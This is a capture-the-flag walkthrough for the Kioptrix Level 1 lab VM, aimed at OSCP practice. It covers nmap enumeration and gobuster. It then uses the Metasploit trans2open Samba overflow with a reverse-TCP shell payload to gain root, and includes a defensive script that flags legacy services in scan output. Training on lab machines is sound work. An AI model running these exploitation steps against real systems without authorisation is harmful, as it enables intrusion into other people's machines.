KIOPTRIX LEVEL 1 WALKTHROUGH

you miss 100% of the shots you don’t take.

— Wayne Gretzky

Today I am writing my first walkthrough, about one of the best-known boxes to solve when preparing for the OSCP.

Kioptrix Level 1 is a boot-to-root box that can be downloaded from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/.

There are several methods you can use to get root on this machine.

In this walkthrough we are going to cover one of them: using the Metasploit Framework.

I assume you have already configured your Kioptrix VM and given it an IP address.

Our first step in solving this box is scanning it for open ports and enumerating the services behind them. This first step is the same whichever method you follow.

Launching Nmap: nmap -sC -sV -T4 <kioptrix_ip> -oN results.txt

This command scans for open ports, runs the default scripts (-sC) and service/version detection (-sV) against them, and saves the output to a text file (-oN results.txt).

The results look something like this:

Nmap scan report for 192.168.75.128
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-04-16T21:16:32+00:00; +1m51s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:FF:BA:B7 (VMware)
Host script results:
|_clock-skew: 1m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

As we can see from the results, there are five important open ports: SSH (22), HTTP (80), SMB (139, with RPC on 111) and HTTPS (443).
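The scan output above is worth triaging systematically rather than by eye. As an added example (not part of the original walkthrough), here is a small Python script that parses an Nmap normal-format (-oN) report into per-port records and flags the legacy-service indicators visible in this scan: SSHv1, SSLv2, the TRACE method, end-of-life Apache 1.3, a Samba build whose version Nmap could not identify, and exposed RPC services. The SAMPLE_REPORT string is a constructed excerpt of the scan shown above, and the rule descriptions are my own wording.

```python
"""Parse an Nmap -oN report and flag legacy-service indicators.

Added example; not part of the original walkthrough. SAMPLE_REPORT is a
constructed excerpt modelled on the Kioptrix scan shown above.
"""
import re

SAMPLE_REPORT = """\
Nmap scan report for 192.168.75.128
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
1024/tcp open  status      1 (RPC #100024)
"""

# A port line: "<port>/<proto>  <state>  <service>  <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(report):
    """Return one dict per port line; NSE script lines ("|" prefix) are
    attached to the port that precedes them."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


# Each rule: (finding description, predicate over a port record).
# The descriptions state why the service is a risk, not how to attack it.
RULES = [
    ("SSH protocol 1 enabled",
     lambda p: any("SSHv1" in s for s in p["scripts"])),
    ("SSLv2 enabled",
     lambda p: any("SSLv2 supported" in s for s in p["scripts"])),
    ("HTTP TRACE enabled",
     lambda p: any("TRACE" in s for s in p["scripts"])),
    ("End-of-life Apache 1.3",
     lambda p: re.search(r"Apache(?: httpd)?[ /]1\.3\.", p["version"]) is not None),
    ("Samba exposed; version not identified by Nmap",
     lambda p: "Samba" in p["version"] and not re.search(r"\d+\.\d+", p["version"])),
    ("Portmapper / RPC service exposed",
     lambda p: p["service"] in ("rpcbind", "status")),
]


def flag_findings(report):
    """Return (port, description) pairs for every rule that fires on an
    open port, sorted by port number."""
    findings = []
    for p in parse_ports(report):
        if p["state"] != "open":
            continue
        for desc, pred in RULES:
            if pred(p):
                findings.append((p["port"], desc))
    return sorted(findings)


if __name__ == "__main__":
    for port, desc in flag_findings(SAMPLE_REPORT):
        print(f"{port:>5}/tcp  {desc}")
```

Run it against a real -oN file by replacing SAMPLE_REPORT with the file contents; on the excerpt above it reports eight findings, which is the same picture the walkthrough draws by hand: every exposed service on this box is a legacy build that would be decommissioned or patched in a maintained environment.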

You can start with any port you want, but I prefer to start with the open web ports (80, 443), brute-forcing directories to see whether there is any hidden directory we can use for further exploitation.

On ports 80 and 443 we only find the default Apache test pages, nothing juicy.

Now we move on to directory brute-forcing. There are many tools you can use (gobuster, ffuf, dirsearch, dirb, ...); for this walkthrough I will use gobuster with DirBuster's 2.3 medium wordlist.

Once the results came in, we checked the discovered directories, but there was nothing interesting.

We can now move on to the other ports. It's time for SMB (139).

From the Nmap result we can see that it was not able to identify the version of Samba running on this box, so to find out we are going to use Metasploit.

We will use this auxiliary scanner: auxiliary/scanner/smb/smb_version

Type show options and we can see there is only one required option, the remote host IP, which is the IP of the Kioptrix box; we can set it with the command: set rhosts <ip>

From the results we can see the Samba version: 2.2.1a.

Now we can look up whether there is a public exploit for this version.

After a while I found this module, https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open, a remote buffer overflow that we can use against this box.

We fire up Metasploit and select this exploit:

exploit/linux/samba/trans2open

From the options we can see that we have to provide rhosts (the Kioptrix IP):

set rhosts <kioptrix_ip>

To get a reverse shell, we will use this payload:

linux/x86/shell_reverse_tcp

Then we have to set our local host (your IP) so the connection comes back to us; for the port it is fine to leave the default 4444:

set lhost <your_ip>

Then type run or exploit to start…

Congratulations, as you can see we have ROOT, which means we have rooted the box.